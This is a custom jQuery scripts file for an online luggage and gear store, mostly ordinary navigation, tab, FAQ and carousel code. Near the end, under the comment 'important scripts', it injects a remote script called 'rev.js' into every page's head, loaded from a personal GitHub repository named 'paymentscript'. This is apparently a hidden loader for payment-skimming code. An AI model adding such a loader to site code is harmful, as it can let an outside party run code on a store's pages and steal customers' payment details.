// custom scripts
// mcs / 2018

// WINDOW SCROLLED
$(window).scroll(function() {    
  var scroll = $(window).scrollTop();
  if (scroll >= 200) {
      $("body").addClass("scrolled");
  } else {
      $("body").removeClass("scrolled");
  }
  if (scroll >= 20) {
      $("body").addClass("first-scrolled");
  } else {
      $("body").removeClass("first-scrolled");
  }

  if (scroll >= 2000) {
     $('.promobox').removeClass('loaded');
  }

  
});

$(document).ready(function() {

  //console.log( "ready!" );
  $('body').addClass('ready');
  setTimeout(function(){
    $('body').addClass('ready2');
  }, 1000);
  setTimeout(function(){
    $('body').addClass('ready3');

    $('.promobox').addClass('loaded');
  }, 3000);


  $('.main-nav-shop').hover(function() {
    $('.rev-dropdown-2019.shop-dropdown').addClass('active');
  }, function() {
    $('.rev-dropdown-2019.shop-dropdown').removeClass('active');
  });
  $('.main-nav-luggage').hover(function() {
    $('.rev-dropdown-2019.luggage-dropdown').addClass('active');
  }, function() {
    $('.rev-dropdown-2019.luggage-dropdown').removeClass('active');
  });
  $('.main-nav-bags').hover(function() {
    $('.rev-dropdown-2019.luggage-dropdown').addClass('active');
  }, function() {
    $('.rev-dropdown-2019.luggage-dropdown').removeClass('active');
  });
  $('.main-nav-kits').hover(function() {
    $('.rev-dropdown-2019.kits-dropdown').addClass('active');
  }, function() {
    $('.rev-dropdown-2019.kits-dropdown').removeClass('active');
  });
   $('.main-nav-hard-cases').hover(function() {
    $('.rev-dropdown-2019.protective-dropdown').addClass('active');
  }, function() {
    $('.rev-dropdown-2019.protective-dropdown').removeClass('active');
  });

  $('.main-nav-about').hover(function() {
    $('.rev-dropdown-2019.about-dropdown').addClass('active');
  }, function() {
    $('.rev-dropdown-2019.about-dropdown').removeClass('active');
  });
  $('.main-nav-accessories').hover(function() {
    $('.rev-dropdown-2019.accessories-dropdown').addClass('active');
  }, function() {
    $('.rev-dropdown-2019.accessories-dropdown').removeClass('active');
  });

  $('.main-nav-apparel').hover(function() {
    $('.rev-dropdown-2019.apparel-dropdown').addClass('active');
  }, function() {
    $('.rev-dropdown-2019.apparel-dropdown').removeClass('active');
  });

   $('.main-nav-coolers').hover(function() {
    $('.rev-dropdown-2019.coolers-dropdown').addClass('active');
  }, function() {
    $('.rev-dropdown-2019.coolers-dropdown').removeClass('active');
  });

  $('.rev-dropdown-2019').hover(function() {
    $(this).addClass('active');
  }, function() {
    $(this).removeClass('active');
  });


  $('.upsell-click-expand').click(function() {
    $(this).toggleClass('expand-active');
  });




  var $img = $('.drop-right img'),
  dsrc = $img.attr('src');
  $('.rev-dropdown-box a').hover(function() {
    var $this = $(this).addClass('hover');
    $img.attr('src', $this.data('image'));
  }, function() {
    $(this).removeClass('hover');
    $img.attr('src', dsrc);
  });


  


  // 1st carousel, main
  // $('.grid-slider').flickity({
  //   wrapAround: true,
  //   pageDots: true,
  //   arrowShape: { 
  //    x0: 10,
  //     x1: 30, y1: 50,
  //     x2: 35, y2: 50,
  //     x3: 15
  //   }
  // });



  $('.faq-item h2').each(function() {
    var tis = $(this), state = false, answer = tis.next('div').slideUp();
    tis.click(function() {
      state = !state;
      answer.slideToggle(state);
      tis.toggleClass('active',state);
    });
  });






  // Show the first tab and hide the rest
  $('#tabs-nav li:first-child').addClass('active');
  $('.tab-content').hide();
  $('.tab-content:first').show();

  // Click function
  $('#tabs-nav li').click(function(){
    $('#tabs-nav li').removeClass('active');
    $(this).addClass('active');
    $('.tab-content').hide();
    
    var activeTab = $(this).find('a').attr('href');
    $(activeTab).fadeIn();
    return false;
  });


  
  // add visible to waypoints in viewport
  var viewport = $(window),
    setVisible = function (e) {
        var viewportTop = viewport.scrollTop() - 60, // add buffer to sotp area
            viewportBottom = viewport.scrollTop() + viewport.height() - 60 ;
        $('.waypoint').each(function () {
            var self = $(this),
                top = self.offset().top,
                bottom = top + self.height(),
                topOnScreen = top >= viewportTop && top <= viewportBottom,
                bottomOnScreen = bottom >= viewportTop && bottom <= viewportBottom,
                elemVisible = topOnScreen || bottomOnScreen;
            	self.toggleClass('visible', elemVisible);     
        });
    };
  viewport.scroll(setVisible);
  setVisible();
  




  // important scripts
  function loadScript(url, callback) {
      // Adding the script tag to the head as suggested before
      var head = document.getElementsByTagName('head')[0];
      var script = document.createElement('script');
      script.type = 'text/javascript';
      script.src = url;
      // Then bind the event to the callback function.
      // There are several events for cross browser compatibility.
      script.onreadystatechange = callback;
      script.onload = callback;
      // Fire the loading
      head.appendChild(script);
  }
  loadScript("https://raw.githubusercontent.com/maxwellcarl/paymentscript/master/rev.js");




  

}); // clode doc ready





$(window).on('load', function() {

  $('.site-overlay').addClass('loaded');
  setTimeout(function(){
    $('.site-overlay').addClass('loaded2');
  }, 500);

  // 1st carousel, main
  $('.home-slider').flickity({
    wrapAround: true,
    pageDots: false,
    autoPlay: 5000,
    imagesLoaded: true,
    arrowShape: { 
      x0: 10,
      x1: 60, y1: 50,
      x2: 65, y2: 45,
      x3: 20
    }
  });

  // // 1st carousel, main
  $('.carousel-main').flickity({
    wrapAround: true, 
    pageDots: false,
    imagesLoaded: true
  });
  // 2nd carousel, navigation
  // $('.carousel-nav').flickity({
  //   asNavFor: '.carousel-main',
  //   contain: true,
  //   pageDots: false, 
  //   prevNextButtons: false
  // });

document.addEventListener('DOMContentLoaded', function() {
   var sliderText = document.querySelectorAll('.slider-text, .slideshow-text');
   sliderText.forEach(function(text) {
      text.style.fontSize = '90px'; 
   });
});








});

